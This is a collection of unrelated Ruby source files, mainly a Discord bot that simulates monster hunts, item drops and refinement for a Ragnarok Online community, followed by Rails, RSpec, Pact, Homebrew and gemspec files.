@total_drop[1] = @total_drop[1].to_i + 1
user_data[3] = user_data[3].to_i + 1
dropCount.drop02 = 1
end
#ジュエルクラウン
if random.rand(rate) <= BORDERDROP3
drop.push(EMOJDROP3)
@today_drop[2] = @today_drop[2].to_i + 1
@total_drop[2] = @total_drop[2].to_i + 1
user_data[4] = user_data[4].to_i + 1
dropCount.drop03 = 1
end
#タブレット
if random.rand(rate) <= BORDERDROP4
drop.push(EMOJDROP4)
@today_drop[3] = @today_drop[3].to_i + 1
@total_drop[3] = @total_drop[3].to_i + 1
user_data[5] = user_data[5].to_i + 1
dropCount.drop04 = 1
end
#ホーリーローブ
if random.rand(rate) <= BORDERDROP5
drop.push(EMOJDROP5)
@today_drop[4] = @today_drop[4].to_i + 1
@total_drop[4] = @total_drop[4].to_i + 1
user_data[6] = user_data[6].to_i + 1
dropCount.drop05 = 1
end
#太陽剣
if random.rand(rate) <= BORDERDROP6
drop.push(EMOJDROP6)
@today_drop[5] = @today_drop[5].to_i + 1
@total_drop[5] = @total_drop[5].to_i + 1
user_data[7] = user_data[7].to_i + 1
dropCount.drop06 = 1
end
#バゼラルド
if random.rand(rate) <= BORDERDROP7
drop.push(EMOJDROP7)
@today_drop[6] = @today_drop[6].to_i + 1
@total_drop[6] = @total_drop[6].to_i + 1
user_data[8] = user_data[8].to_i + 1
dropCount.drop07 = 1
end
#ファラオカード
if random.rand(rate) <= BORDERDROP8
drop.push(EMOJDROP8)
@today_drop[7] = @today_drop[7].to_i + 1
@total_drop[7] = @total_drop[7].to_i + 1
user_data[9] = user_data[9].to_i + 1
dropCount.drop08 = 1
#cardファイルにカードドロップ者の情報を追記
File.open(FILECARD, 'a') do |f3|
f3.puts(user_name + " " + (@total_down.to_i + 1).to_s + "体目 " + now.strftime('%Y年%m月%d日 %H時%M分%S秒'))
end
#目立つようにカード画像を表示
card = card + "\nhttps://rotool.gungho.jp/icon/4148.png"
end
#アプローズサンダル
if random.rand(rate) <= BORDERDROP9
drop.push(EMOJDROP9)
@today_drop[8] = @today_drop[8].to_i + 1
@total_drop[8] = @total_drop[8].to_i + 1
user_data[10] = user_data[10].to_i + 1
dropCount.drop09 = 1
end
#パサナカード(ハズレカードなので集計対象外)
if random.rand(rate) <= BORDERDROP8
drop.push(EMOJDROP8)
dropCount.drop10 = 1
#目立つようにカード画像を表示
card = card + "\nhttps://rotool.gungho.jp/icon/4099.png"
end
#マルドゥークカード(ハズレカードなので集計対象外)
if random.rand(rate) <= BORDERDROP8
drop.push(EMOJDROP8)
dropCount.drop11 = 1
#目立つようにカード画像を表示
card = card + "\nhttps://rotool.gungho.jp/icon/4112.png"
end
#闇リンゴ(ハズレアイテムなので集計対象外)
if random.rand(rate) <= BORDERDROPEX
drop.push(EMOJDROPEX)
dropCount.drop12 = 1
end
#ノードロップ時の表示
if drop.empty?
drop.push(EMOJNODROP)
end
#チャンネルにドロップ判定を表示
event.respond mvp + drop.join("") + card
#resultファイルの更新
@today_down = @today_down.to_i + 1
@total_down = @total_down.to_i + 1
File.open(FILERESULT, 'w') do |f1|
f1.puts(@today_down.to_i)
f1.puts(@today_drop.join(","))
f1.puts(@total_down.to_i)
f1.puts(@total_drop.join(","))
f1.puts(@summary_day.to_i)
f1.close
end
#DB登録:討伐時のドロップ情報
db_faraohunt = @db[:faraohunt]
db_faraohunt.insert(
:hunt_date => now,
:user_id => event.user.id,
:user_distinct => event.user.distinct,
:user_name => event.user.display_name,
:user_hunt_count => user_data[1].to_i ,
:elapsed_time => hunttime,
:drop01 => dropCount.drop01.to_i,
:drop02 => dropCount.drop02.to_i,
:drop03 => dropCount.drop03.to_i,
:drop04 => dropCount.drop04.to_i,
:drop05 => dropCount.drop05.to_i,
:drop06 => dropCount.drop06.to_i,
:drop07 => dropCount.drop07.to_i,
:drop08 => dropCount.drop08.to_i,
:drop09 => dropCount.drop09.to_i,
:drop10 => dropCount.drop10.to_i,
:drop11 => dropCount.drop11.to_i,
:drop12 => dropCount.drop12.to_i,
)
#rankファイルの更新
rank[idx] = user_data.join(",")
File.open(FILERANK, 'w') do |f3|
for i in 0..rank.length - 1 do
f3.puts(rank[i])
end
f3.close
end
#次の沸き時間を設定
now = Time.now
sleeptime = @setting_farao['sleepBasic'] + random.rand(@setting_farao['sleepMargin'])
#ロックファイルの沸き時間を更新
faraotime_raw = (now + sleeptime)
faraotime = faraotime_raw.strftime('%Y%m%d%H%M%S')
lock.puts(faraotime)
#ファイルロック解除
lock.flock(File::LOCK_UN)
#DB登録:ファラオの湧き時間
db_faraotime = @db[:faraotime]
db_faraotime.insert(
:spawn_date => faraotime_raw,
)
lock.close
end
end
#沸き時間が経過するまでBOTをオフライン表示
set_online(bot, false)
end
end
#タブレット精錬コマンド
bot.message(containing: EMOJDROP4) do |event|
#タブレットのドロップ数取得
tabnum = 0
File.open(FILERESULT, 'r') do |f|
@today_down = f.gets
@today_drop = f.gets.split(",")
tabnum = @today_drop[3].to_i
end
#tabletファイルから精錬回数データを取得
tabdata = []
File.open(FILETABLET, 'r') do |f2|
f2.each_line do |line|
if line != ""
tabdata.push(line.toutf8)
end
end
end
#今までのトータル精錬回数を取得
tabtotal = tabdata[0].to_i
#精錬回数データから発言者のデータを取得
idx = -1
user_data = []
user_name = event.user.display_name
for i in 1..tabdata.length-1 do
user_data = tabdata[i].split(",")
if user_name == user_data[0]
idx = i
break
end
end
#精錬回数データに発言者のデータが無い場合は末尾に追加
if idx == -1
tabdata.push(user_name + ",0")
user_data = tabdata[tabdata.length - 1].split(",")
idx = tabdata.length - 1
end
#タブレットドロップ数より精錬回数が少ない場合精錬実行
if user_data[1].to_i < tabnum
#乱数の設定
random = Random.new
value = 10
for i in 0..4 do
if random.rand(99) <= 100 - SEIREN[i]
value = i + 5
break
end
end
if value < 10
msg = "クホホホホ… +" + value.to_s + " タブレットの精錬が失敗しました。"
else
#tablistファイルに+10精錬成功者の情報を追記
File.open(FILETABLIST, 'a') do |f3|
f3.puts(user_name + " " + (tabtotal.to_i + 1).to_s + "本目 " + now.strftime('%Y年%m月%d日 %H時%M分%S秒'))
end
msg = "武具が強くなって君も嬉しいだろ? +" + value.to_s + " タブレットの精錬が成功しました。"
end
#tabletファイルの更新
user_data[1] = user_data[1].to_i + 1
tabdata[idx] = user_data.join(",")
File.open(FILETABLET, 'w') do |f3|
f3.puts((tabtotal+1).to_s)
for i in 1..tabdata.length - 1 do
f3.puts(tabdata[i])
end
f3.close
end
#DB登録:精錬情報
#ユーザー別製錬回数を取得し、+1する
db_tabletuser = @db[:tabletuser]
ds_tabletuser = db_tabletuser.where(:user_id => event.user.id).first()
user_refine_count = 1
if !ds_tabletuser.nil?
user_refine_count = ds_tabletuser[:user_refine_count].to_i + 1
end
db_tabletrefine = @db[:tabletrefine]
db_tabletrefine.insert(
:refine_date => now,
:user_id => event.user.id,
:user_distinct => event.user.distinct,
:user_name => event.user.display_name,
:user_refine_count => user_refine_count,
:refine_result => value.to_i,
)
event.respond msg
end
end
bot.command(:faresult, description:"これまでの討伐数とドロップ数の集計を表示します。") do |event|
event.respond get_summary()
end
bot.command(:farank, description:"討伐数ランキングを表示します。") do |event|
rank = []
down = []
user_data = []
exp = []
disprank = 0
#rankファイルからランキングデータを取得
File.open(FILERANK, 'r') do |f1|
f1.each_line do |line|
rank.push(line.toutf8)
end
end
#ランキングデータからドロップアイテムのポイントを算出
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
pt = 0
pt = pt + user_data[2].to_i * 10001 / (BORDERDROP1 + 1)
pt = pt + user_data[3].to_i * 10001 / (BORDERDROP2 + 1)
pt = pt + user_data[4].to_i * 10001 / (BORDERDROP3 + 1)
pt = pt + user_data[5].to_i * 10001 / (BORDERDROP4 + 1)
pt = pt + user_data[6].to_i * 10001 / (BORDERDROP5 + 1)
pt = pt + user_data[7].to_i * 10001 / (BORDERDROP6 + 1)
pt = pt + user_data[8].to_i * 10001 / (BORDERDROP7 + 1)
pt = pt + user_data[9].to_i * 10001 / (BORDERDROP8 + 1)
pt = pt + user_data[10].to_i * 10001 / (BORDERDROP9 + 1)
pt = (pt * 1.8 / 100).round
down.push(pt)
end
#経験値テーブルを取得
File.open(FILEEXP, 'r') do |f2|
f2.each_line do |line|
exp.push(line.toutf8)
end
end
#ポイントの降順で並び替える
len = down.length
for i in 1..len do
for j in 1..len-i do
if down[j-1].to_i < down[j].to_i
temp1 = down[j]
down[j] = down[j-1]
down[j-1] = temp1
temp2 = rank[j]
rank[j] = rank[j-1]
rank[j-1] = temp2
end
end
end
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
if user_data[0] == event.user.display_name
#表示を始める順位を設定
if i < 2
disprank = 0
elsif i > rank.length-3
disprank = rank.length-5
else
disprank = i - 2
end
end
end
#自分の前後2人までのランキングデータを表示
event.respond "■討伐数ランキング\n\n"
msg = ""
for i in disprank..disprank+4 do
user_data = rank[i].split(",")
#Lvを算出
for j in 0..exp.length-1 do
exp_data = exp[j].split(",")
if user_data[1].to_i * FARAOEXP < exp_data[1].to_i
user_lv = exp_data[0]
break
end
end
msg = msg + (i + 1).to_s + "位 "
msg = msg + user_data[0] + " "
msg = msg + down[i].to_s + "P "
msg = msg + user_lv + " "
msg = msg + user_data[1] + "体 "
msg = msg + "\n "
msg = msg + EMOJDROP1 + user_data[2]
msg = msg + EMOJDROP2 + user_data[3]
msg = msg + EMOJDROP3 + user_data[4]
msg = msg + EMOJDROP4 + user_data[5]
msg = msg + EMOJDROP5 + user_data[6]
msg = msg + EMOJDROP6 + user_data[7]
msg = msg + EMOJDROP7 + user_data[8]
msg = msg + EMOJDROP8 + user_data[9]
msg = msg + EMOJDROP9 + user_data[10]
end
event.respond msg
end
bot.command(:fastatus, description:"自分の討伐数とドロップ数を表示します。") do |event|
rank = []
down = []
user_data = []
exp = []
#rankファイルからランキングデータを取得
File.open(FILERANK, 'r') do |f1|
f1.each_line do |line|
rank.push(line.toutf8)
end
end
#経験値テーブルを取得
File.open(FILEEXP, 'r') do |f2|
f2.each_line do |line|
exp.push(line.toutf8)
end
end
#発言者のデータを表示
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
if user_data[0] == event.user.display_name
#Lvを算出
for j in 0..exp.length-1 do
exp_data = exp[j].split(",")
if user_data[1].to_i * FARAOEXP < exp_data[1].to_i
user_lv = exp_data[0]
break
end
end
#ポイントを算出
pt = 0
pt = pt + user_data[2].to_i * 10001 / (BORDERDROP1 + 1)
pt = pt + user_data[3].to_i * 10001 / (BORDERDROP2 + 1)
pt = pt + user_data[4].to_i * 10001 / (BORDERDROP3 + 1)
pt = pt + user_data[5].to_i * 10001 / (BORDERDROP4 + 1)
pt = pt + user_data[6].to_i * 10001 / (BORDERDROP5 + 1)
pt = pt + user_data[7].to_i * 10001 / (BORDERDROP6 + 1)
pt = pt + user_data[8].to_i * 10001 / (BORDERDROP7 + 1)
pt = pt + user_data[9].to_i * 10001 / (BORDERDROP8 + 1)
pt = pt + user_data[10].to_i * 10001 / (BORDERDROP9 + 1)
pt = (pt * 1.8 / 100).round
msg = user_data[0] + " "
msg = msg + pt.to_s + "P "
msg = msg + user_lv + " "
msg = msg + user_data[1] + "体 "
msg = msg + EMOJDROP1 + user_data[2]
msg = msg + EMOJDROP2 + user_data[3]
msg = msg + EMOJDROP3 + user_data[4]
msg = msg + EMOJDROP4 + user_data[5]
msg = msg + EMOJDROP5 + user_data[6]
msg = msg + EMOJDROP6 + user_data[7]
msg = msg + EMOJDROP7 + user_data[8]
msg = msg + EMOJDROP8 + user_data[9]
msg = msg + EMOJDROP9 + user_data[10]
event.respond msg
break
end
end
end
bot.command(:falist, description:"1/500の壁を越えし者達を表示します。") do |event|
i = 1
msg = "■1/500の壁を越えし者達\n\n"
#cardファイルからカード取得者の一覧を取得し表示
File.open(FILECARD, 'r') do |f3|
f3.each_line do |line|
msg = msg + i.to_s + "枚目:" + line.toutf8
i = i + 1
end
end
event.respond msg
end
bot.command(:tablist, description:"ホルグレンに勝利を収めし者達を表示します。") do |event|
i = 1
msg = "■ホルグレンに勝利を収めし者達\n\n"
#tablistファイルから精錬成功者の一覧を取得し表示
File.open(FILETABLIST, 'r') do |f3|
f3.each_line do |line|
msg = msg + i.to_s + "本目:" + line.toutf8
i = i + 1
end
end
event.respond msg
end
bot.command(:farespawn, help_available:false, description:"湧き時間の再読み込みを行います。") do |event|
#バグ沸き時用再スリープコマンド
#沸き時間
faraotime = ""
now = Time.now
File.open(FILELOCK, 'r') do |lock|
#ファラオの沸き時間を取得
faraotime = lock.gets
end
#沸き時間まで待機
if now.strftime('%Y%m%d%H%M%S').to_i < faraotime.to_i
set_online(bot, false)
else
set_online(bot, true)
end
end
bot.command(:fastop, help_available:false, description:"このBOTを停止させます。") do |event|
#BOT停止用コマンド
if event.user.display_name == "Sato"
bot.stop
end
end
#起動時
bot.ready do |event|
@db = create_database()
File.open(FILERESULT, 'r') do |f|
@today_down = f.gets
@today_drop = f.gets.split(",")
@total_down = f.gets
@total_drop = f.gets.split(",")
@summary_day = f.gets
end
faraotime = ""
now = Time.now
File.open(FILELOCK, 'r') do |lock|
#ファラオの沸き時間を取得
faraotime = lock.gets
end
#沸き時間まで待機
if now.strftime('%Y%m%d%H%M%S').to_i < faraotime.to_i
set_online(bot, false)
else
File.open(FILELOCK, 'w') do |lock|
#ロックファイルの沸き時間を更新
lock.puts(now.strftime('%Y%m%d%H%M%S'))
sleep(1)
end
end
end
#DBインスタンス生成
def create_database()
#何かオプションを指定する場合は下記に追記する
options = {:encoding=>"utf8"}
#DBに接続
database = Sequel.sqlite(@setting_auth['database']['path'] , options)
if @setting_auth['database']['logging']
database.loggers << Logger.new($stdout)
database.loggers.push(Logger.new(@setting_auth['database']['logfile']))
end
return database
end
#resultファイルから討伐数とドロップアイテム数を取得し表示
def get_summary()
msg=""
File.open(FILERESULT, 'r') do |f|
@today_down = f.gets
@today_drop = f.gets.split(",")
@total_down = f.gets
@total_drop = f.gets.split(",")
msg = "■討伐数\n"
msg = msg + "本日:" + @today_down
msg = msg + "合計:" + @total_down + "\n"
msg = msg + "■ドロップアイテム\n"
msg = msg + "本日:"
msg = msg + EMOJDROP1 + @today_drop[0]
msg = msg + EMOJDROP2 + @today_drop[1]
msg = msg + EMOJDROP3 + @today_drop[2]
msg = msg + EMOJDROP4 + @today_drop[3]
msg = msg + EMOJDROP5 + @today_drop[4]
msg = msg + EMOJDROP6 + @today_drop[5]
msg = msg + EMOJDROP7 + @today_drop[6]
msg = msg + EMOJDROP8 + @today_drop[7]
msg = msg + EMOJDROP9 + @today_drop[8]
msg = msg + "合計:"
msg = msg + EMOJDROP1 + @total_drop[0]
msg = msg + EMOJDROP2 + @total_drop[1]
msg = msg + EMOJDROP3 + @total_drop[2]
msg = msg + EMOJDROP4 + @total_drop[3]
msg = msg + EMOJDROP5 + @total_drop[4]
msg = msg + EMOJDROP6 + @total_drop[5]
msg = msg + EMOJDROP7 + @total_drop[6]
msg = msg + EMOJDROP8 + @total_drop[7]
msg = msg + EMOJDROP9 + @total_drop[8]
end
return msg
end
#onlineかどうか
def is_online()
return @is_online
end
#online状態の更新
def set_online(bot, value)
@is_online = value
if @is_online
bot.online
popArea = @setting_farao['location']['area']
popDetails = @setting_farao['location']['details']
location = ""
if popDetails.length > 0
random = Random.new
location = "【#{popDetails[random.rand(popDetails.length - 1)]}】"
end
bot.game = "#{location}#{popArea}"
else
bot.invisible
bot.game = ""
end
end
bot.run :async
begin
#非同期のため、イベント待機
loop do
sleep(0.1)
now = Time.now
#集計日付が変わっていれば集計値初期化
if now.strftime('%Y%m%d').to_i > @summary_day.to_i
#初期化前に今日の結果を通知
msg = get_summary()
bot.send_message(CHANNELID, msg)
@summary_day = now.strftime('%Y%m%d').to_i
File.open(FILERESULT, 'w') do |f|
f.puts("0")
f.puts("0,0,0,0,0,0,0,0,0")
f.puts(@total_down)
f.puts(@total_drop.join(","))
f.puts(@summary_day)
f.close
end
#精錬回数初期化
total_tab = ""
File.open(FILETABLET, 'r') do |f2|
total_tab = f2.gets
end
File.open(FILETABLET, 'w') do |f2|
f2.puts(total_tab)
f2.close
end
end
#沸き時間が過ぎている場合、オンラインにする
if now.strftime('%Y%m%d%H%M%S').to_i >= faraotime.to_i && !is_online()
set_online(bot, true)
end
end
rescue SignalException => ex
puts "SignalException SIG#{Signal::signame(ex.signo)}(#{ex.signo})"
sleep(1)
@db.disconnect
bot.stop
end
| 27.881517 | 113 | 0.556519 |
5d4a540688fe5567f2a8a5054f76e09ec8cc9711 | 1,460 |
require 'rails_helper'
RSpec.describe FlashMessageHelper, type: :helper do
it { expect(helper).to be_a described_class }
describe '#format_managers_combined_contacts' do
context ' when not expected to start a sentence' do
subject { helper.format_managers_combined_contacts(managers) }
context 'when passed a collection of Users' do
let(:managers) { create_list :manager, 2 }
it 'returns a single html mailto link with all managers' do
is_expected.to eql("<a href='mailto:[email protected];[email protected]'>managers</a>")
end
end
context 'when passed no users' do
let(:managers) { [] }
it 'returns a string' do
is_expected.to eql('a manager')
end
end
end
context 'when expected to start a sentence' do
subject { helper.format_managers_combined_contacts(managers, true) }
context 'when passed a collection of Users' do
let(:managers) { create_list :manager, 2 }
it 'returns a single html mailto link with all managers with capitalised text' do
is_expected.to eql("<a href='mailto:[email protected];[email protected]'>Managers</a>")
end
end
context 'when passed no users' do
let(:managers) { [] }
it 'returns a capitalised string' do
is_expected.to eql('A manager')
end
end
end
end
end
| 32.444444 | 121 | 0.65274 |
7a628ed95ae90f8971e88f12910e2bdd77828e97 | 2,028 |
# typed: false
# frozen_string_literal: true
require File.expand_path("../Abstract/abstract-php-extension", __dir__)
# Class for Pecl_http Extension
class PeclHttpAT72 < AbstractPhpExtension
init
desc "Pecl_http PHP extension"
homepage "https://github.com/m6w6/ext-http"
url "https://pecl.php.net/get/pecl_http-3.2.4.tgz"
sha256 "37354ff7680b9b9839da8b908fff88227af7f6746c2611c873493af41d54f033"
head "https://github.com/m6w6/ext-http.git"
license "BSD-2-Clause"
revision 1
bottle do
root_url "https://ghcr.io/v2/shivammathur/extensions"
rebuild 1
sha256 arm64_big_sur: "f851fd9a85a4acead2709466c4a519a66395b9889f340483370b6ce72e60e37f"
sha256 big_sur: "9e1948a38e5371102e3acc6a0143fa4a2a0424dc04b36a6434f4e0a0f98bd48e"
sha256 catalina: "5ccba6a5187f92b7016c9621f0dd71f79ecf94c48f1fc9d6194d6903ae59f2c3"
sha256 cellar: :any_skip_relocation, x86_64_linux: "12734aeba9f8295c0ecb6648811db45a578a37e4656cc7f2a72b5e234996d526"
end
depends_on "brotli"
depends_on "curl"
depends_on "icu4c"
depends_on "libevent"
depends_on "libidn2"
depends_on "shivammathur/extensions/[email protected]"
depends_on "shivammathur/extensions/[email protected]"
def install
args = %W[
--with-http
--with-http-libicu-dir=#{Formula["icu4c"].opt_prefix}
--with-http-zlib-dir=#{MacOS.sdk_path_if_needed}/usr
]
extra_includes = %W[
-I#{Formula["shivammathur/extensions/[email protected]"].opt_include}/php
-I#{Formula["shivammathur/extensions/[email protected]"].opt_include}/php
]
ENV["EXTRA_INCLUDES"] = extra_includes * " "
Dir.chdir "pecl_http-#{version}"
inreplace "src/php_http_api.h", "ext/raphf", "ext/[email protected]"
inreplace "src/php_http_api.h", "ext/propro", "ext/[email protected]"
safe_phpize
system "./configure", "--prefix=#{prefix}", phpconfig, *args
system "make"
prefix.install "modules/#{extension}.so"
write_config_file
end
end
| 36.872727 | 122 | 0.703156 |
ace1d75c84c8b4f8596fc133c15824821ed5a691 | 1,375 |
# frozen_string_literal: true
module Opera
module Operation
module Builder
INSTRUCTIONS = %I[validate transaction benchmark step success operation operations].freeze
def self.included(base)
base.extend(ClassMethods)
end
module ClassMethods
def instructions
@instructions ||= []
end
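# Define one class-level DSL method per instruction kind; each builds its instructions
# via InnerBuilder and appends them to this operation's list.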
INSTRUCTIONS.each do |instruction|
define_method instruction do |method = nil, &blk|
instructions.concat(InnerBuilder.new.send(instruction, method, &blk))
end
end
end
class InnerBuilder
attr_reader :instructions
def initialize(&block)
@instructions = []
instance_eval(&block) if block_given?
end
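# A call with a block nests further instructions; a bare call just records the target method name.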
INSTRUCTIONS.each do |instruction|
define_method instruction do |method = nil, &blk|
instructions << if !blk.nil?
{
kind: instruction,
instructions: InnerBuilder.new(&blk).instructions
}
else
{
kind: instruction,
method: method
}
end
end
end
end
end
end
end
| 26.960784 | 96 | 0.484364 |
bf9dbdbf6c6ac2b5762e8c45a3bda1ea89b47e79 | 502 |
class UsersController < ApplicationController
def show
@user = User.find(params[:id])
end
def new
@user = User.new
end
def create
@user = User.new(user_params)
if @user.save
log_in @user
flash[:success] = "Welcome to the Sample App!"
redirect_to @user
else
render 'new'
end
end
private
def user_params
params.require(:user).permit(:name, :email, :password,
:password_confirmation)
end
end
| 17.928571 | 60 | 0.591633 |
d54ff3d5f5e75a75df96ecfb6fe279df5c68098b | 489 |
class CleanupApplicationSettingsPasswordAuthenticationEnabledRename < ActiveRecord::Migration
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
disable_ddl_transaction!
def up
cleanup_concurrent_column_rename :application_settings, :password_authentication_enabled, :password_authentication_enabled_for_web
end
def down
rename_column_concurrently :application_settings, :password_authentication_enabled_for_web, :password_authentication_enabled
end
end
| 30.5625 | 134 | 0.856851 |
b9926a62ca186c254357600f33194654dc8979fb | 784 |
cask "calendar-366" do
version "2.9.8,3379"
sha256 "b4702ea8eaba53cc464ac02a36cb41d5537178f0581d21b608787fbfb3e95d43"
url "https://nspektor.com/downloads/Calendar366_v#{version.before_comma}.dmg"
name "Calendar 366 II"
desc "Menu bar calendar for events and reminders"
homepage "https://nspektor.com/calendar366/mac"
livecheck do
url "https://nspektor.com/downloads/Calendar366IIAsset.xml"
strategy :sparkle
end
depends_on macos: ">= :sierra"
app "Calendar 366 II.app"
zap trash: [
"~/Library/Application Scripts/com.nspektor.macos.Calendar-366-II-Mini",
"~/Library/Application Support/Calendar 366 II",
"~/Library/Caches/com.nspektor.macos.Calendar-366-II",
"~/Library/Preferences/com.nspektor.macos.Calendar-366-II.plist",
]
end
| 30.153846 | 79 | 0.737245 |
5dbe5985ae2404871b9175e34a67703ad4bacb8c | 1,937 |
# -*- encoding: utf-8 -*-
# stub: rails-html-sanitizer 1.3.0 ruby lib
Gem::Specification.new do |s|
s.name = "rails-html-sanitizer".freeze
s.version = "1.3.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Rafael Mendon\u00E7a Fran\u00E7a".freeze, "Kasper Timm Hansen".freeze]
s.date = "2019-10-06"
s.description = "HTML sanitization for Rails applications".freeze
s.email = ["[email protected]".freeze, "[email protected]".freeze]
s.homepage = "https://github.com/rails/rails-html-sanitizer".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "2.7.6".freeze
s.summary = "This gem is responsible to sanitize HTML fragments in Rails applications.".freeze
s.installed_by_version = "2.7.6" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<loofah>.freeze, ["~> 2.3"])
s.add_development_dependency(%q<bundler>.freeze, [">= 1.3"])
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<minitest>.freeze, [">= 0"])
s.add_development_dependency(%q<rails-dom-testing>.freeze, [">= 0"])
else
s.add_dependency(%q<loofah>.freeze, ["~> 2.3"])
s.add_dependency(%q<bundler>.freeze, [">= 1.3"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
s.add_dependency(%q<rails-dom-testing>.freeze, [">= 0"])
end
else
s.add_dependency(%q<loofah>.freeze, ["~> 2.3"])
s.add_dependency(%q<bundler>.freeze, [">= 1.3"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
s.add_dependency(%q<rails-dom-testing>.freeze, [">= 0"])
end
end
| 43.044444 | 112 | 0.660816 |
8722594a317a2f170aac4a9cb1b08de3acbffc24 | 4,484 |
require 'spec/support/test_data_builder'
Pact.provider_states_for "Pact Ruby" do
provider_state "the relations for retrieving pacts exist in the index resource" do
no_op
end
provider_state "the relation for retrieving WIP pacts exists in the index resource" do
no_op
end
provider_state "consumer-1 has a WIP pact with provider provider-1" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have pacts with provider provider-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have pacts with provider provider-1 tagged with tag-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-1')
.create_pact
.create_consumer("consumer-2")
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-1')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have pacts with provider provider-1 tagged with tag-2' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-2')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-2')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have 2 pacts with provider provider-1 tagged with tag-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-1')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-1')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have 2 pacts with provider provider-1 tagged with tag-2' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-2')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-2')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have 2 pacts with provider provider-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_pact
end
end
provider_state "consumer-1 and consumer-2 have no pacts with provider provider-1 tagged with tag-1" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_pact
end
end
provider_state "consumer-1 and consumer-2 have pacts with provider provider-1 tagged with master" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('master')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('master')
.create_pact
end
end
provider_state "consumer-1 has no pacts with provider provider-1 tagged with tag-1" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
end
end
end
| 30.503401 | 104 | 0.658787 |
91fe0f18545a4a9d103f5980171e42dd572bf2cc | 2,330 | require 'csv'
require 'tempfile'
describe Mrkt::ImportLeads do
include_context 'with an initialized client'
describe '#import_lead' do
subject { client.import_lead(tempfile) }
let(:tempfile) { Tempfile.new(%w[import-leads csv]) }
let(:response_stub) do
{
requestId: 'c245#14cd6830ae2',
success: true,
result: [
{
batchId: 1,
status: 'Importing'
}
]
}
end
before do
CSV.open(tempfile, 'wb') do |csv|
csv << %w[email firstName lastName]
csv << %w[[email protected] John Snow]
end
stub_request(:post, "https://#{host}/bulk/v1/leads.json")
.with(headers: { content_type: %r{multipart/form-data; boundary=\S+} })
.to_return(json_stub(response_stub))
end
after do
tempfile.unlink
end
it { is_expected.to eq(response_stub) }
end
describe '#import_lead_status' do
subject { client.import_lead_status(1) }
let(:id) { 1 }
let(:response_stub) do
{
requestId: 'c245#14cd6830ae2',
result: [
{
batchId: id,
status: 'Importing',
numOfLeadsProcessed: 4,
numOfRowsFailed: 1,
numOfRowsWithWarning: 0,
message: 'Import completed with errors, 4 records imported (4 members), 1 failed'
}
],
success: true
}
end
before do
stub_request(:get, "https://#{host}/bulk/v1/leads/batch/#{id}.json")
.to_return(json_stub(response_stub))
end
it { is_expected.to eq(response_stub) }
end
describe '#import_lead_failures' do
subject { client.import_lead_failures(1) }
let(:id) { 1 }
let(:response_stub) { '' }
before do
stub_request(:get, "https://#{host}/bulk/v1/leads/batch/#{id}/failures.json")
.to_return(headers: { content_length: 0 })
end
it { is_expected.to eq(response_stub) }
end
describe '#import_lead_warnings' do
subject { client.import_lead_warnings(1) }
let(:id) { 1 }
let(:response_stub) { '' }
before do
stub_request(:get, "https://#{host}/bulk/v1/leads/batch/#{id}/warnings.json")
.to_return(headers: { content_length: 0 })
end
it { is_expected.to eq(response_stub) }
end
end
| 23.535354 | 93 | 0.582403 |
7af9407c722a520122421af1c804bb3ae08db835 | 9,003 | class Volatility < Formula
include Language::Python::Virtualenv
desc "Advanced memory forensics framework"
homepage "https://github.com/volatilityfoundation/volatility"
url "https://github.com/volatilityfoundation/volatility/archive/2.6.1.tar.gz"
sha256 "a8dfdbdb2aaa0885387b709b821bb8250e698086fb32015bc2896ea55f359058"
revision OS.mac? ? 2 : 3
